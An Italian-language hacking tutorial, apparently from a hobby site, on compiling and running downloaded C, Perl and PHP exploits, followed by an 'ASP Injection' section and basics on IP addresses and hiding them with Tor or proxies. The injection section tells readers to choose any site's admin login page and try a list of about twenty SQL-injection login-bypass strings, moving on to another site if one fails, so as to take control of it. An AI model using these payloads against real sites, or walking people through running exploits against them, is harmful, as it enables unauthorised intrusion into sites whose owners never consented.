"Ma come faccio a capire con quale linguaggio è scritto l'exploit?" Niente paura, manmano che vi spiego come usarli vi spiegherò anche come riconoscerli.

"EXPLOITS" IN C
Iniziamo con gli exploit in scritti in C: Per riconoscerli basta vedere se all'inizio si trova qualche stringa con scritto #include. Visto e considerato che l'exploit è scritto in C dobbiamo usare un compilatore del linguaggio C per Windows
Io consiglio Cygwin (che è ottimo anche per sistemi Linux/Unix) che però può sembrare più complicato, ma poi non lo è.
Bene, andiamo a scaricare il nostro Cygwin da http://www.cygwin.com/ una volta scaricato troverete la semplice configurazione da applicare nel procedimento di installazione qui:
http://forum.milw0rm.com/showthread.php?t=...ompile+c+cygwin
finita l'installazione possiamo compilare il nostro exploit seguendo questo procedimento:
Copiare l'exploit e incollarlo nel Blocco Note e salvarlo nella cartella C:\Cygwin\bin con esntenzione ".c";
Aprire il prompt dei comandi e digitare "cd C:\Cygwin\bin" (senza virgolette) in modo che il prompt si sposti nella cartella
C:\Cygwin\bin, adesso digitiamo "gcc nomeexploit.c -o nomeexploit.exe" (sempre senza virgolette) e l'exploit è pronto, con le opzioni davanti a voi.

"EXPLOITS" IN PERL
Passiamo agli exploit in PERL: Per riconoscere un exploit in perl basta vedere se inizia con #!/usr/bin/perl, se inizia così l'exploit è scritto in perl. Bene adesso andiamo a scaricare il miglior compilatore per perl ovvero ActivePerl, per farlo basta andare su www.activestate.com una volta scaricato e installato con le impostazioni e il percorso predefinito, prendiamo il nostro exploit, apriamo il Blocco Note, lo incolliamo e salviamo il tutto nella cartella C:\Perl\bin con destenzione ".pl". (Per es.exploit.pl)
Fatto questo basta aprire il Prompt dei Comandi e scrivere: "cd C:\Perl\bin" (senza virgolette) e dare invio in modo che il prompt vada nella cartella C:\Perl\bin dopo di che digitiamo ancora nel prompt: perl "nome.pl"(senza virgolette) e daremo invio.
Facciamo un esempio: se l'exploit lo abbiamo salvato come "exploit.pl" nel prompt scriveremo: perl exploit.pl e daremo invio, adesso l'exploit è avviato e ci appariranno le varie opzioni.

"EXPLOITS" IN PHP
Adesso tocca agli exploit in PHP: Per vedere se un exploit è scritto in php basta guardare i due tag (chiusura).
Siccome per usare gli exploit in php ci serve un server locare dobbiamo crearcelo e per fare ciò bisogna installare Easy PHP che trovate qui: http://www.easyphp.org/telechargements.php3.
Dopo aver installato il programma possiamo procedere con la compilazione e l'uso dell' exploit, innanzitutto prendiamo l'exploit e facciamo il copia e incolla su Blocco Note ora salviamo il tutto nella cartella in cui abbiamo installato Easy PHP con estenzione ".php".
Ora possiamo avviare l'exploit digitando su un browser http:/localhost/nomeexploit.php ed è missione compiuta!

ASP Injection


Per fare una Asp Injection dobbiamo usare il nostro browser Internet e dobbiamo scrivere nella barra degli indirizzi:
admin login.asp
Scegliere un sito qualsiasi e in username o Nome utente & Password scrivete:

Username : admin
Password : 1'or'1'='1

Se non dovesse funzionare scegliete un'altro sito oppure provate con questi altri codici:

' or a=a--
' or 1=1--
admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a


Questo tipo di attacco permette di controllare un sito creato in ASP e di prendere il controllo, siate sempre proxaty e non fate LAMERATE!

Indirizzi IP


Cosa è un indirizzo IP?
Un Indirizzo IP è un numero che identifica univocamente un dispositivo collegato a una rete informatica che comunica utilizzando lo standard IP (Internet Protocol); tutte le volte che un computer effettua una connessione ad internet ad esso viene assegnato un indirizzo IP. L’indirizzo IP è una sequenza di 4 numeri che vanno da 0 a 255 (es. 92.112.71.14).

Come lo trovo?
LINUX
Per conoscere il proprio indirizzo IP, subnet mask e gateway nei sistemi basati su Linux (Ubuntu, Debian, Fedora, etc.) è sufficiente aprire una shell e digitare, da root, il comando ifconfig.
WINDOWS
Nei sistemi operativi Microsoft Windows si possono avere le informazioni desiderate col comando ipconfig tramite il prompt dei comandi(cmd).
Oppure clicca semplicemente qui: Script HackerLife


Lo posso cambiare?
Certo,ecco i metodi più comuni:

Si possono usare programmi come TOR, programma gratuito molto semplice e gratuito,se volete scaricarlo cliccate qui

Utilizzare dei proxy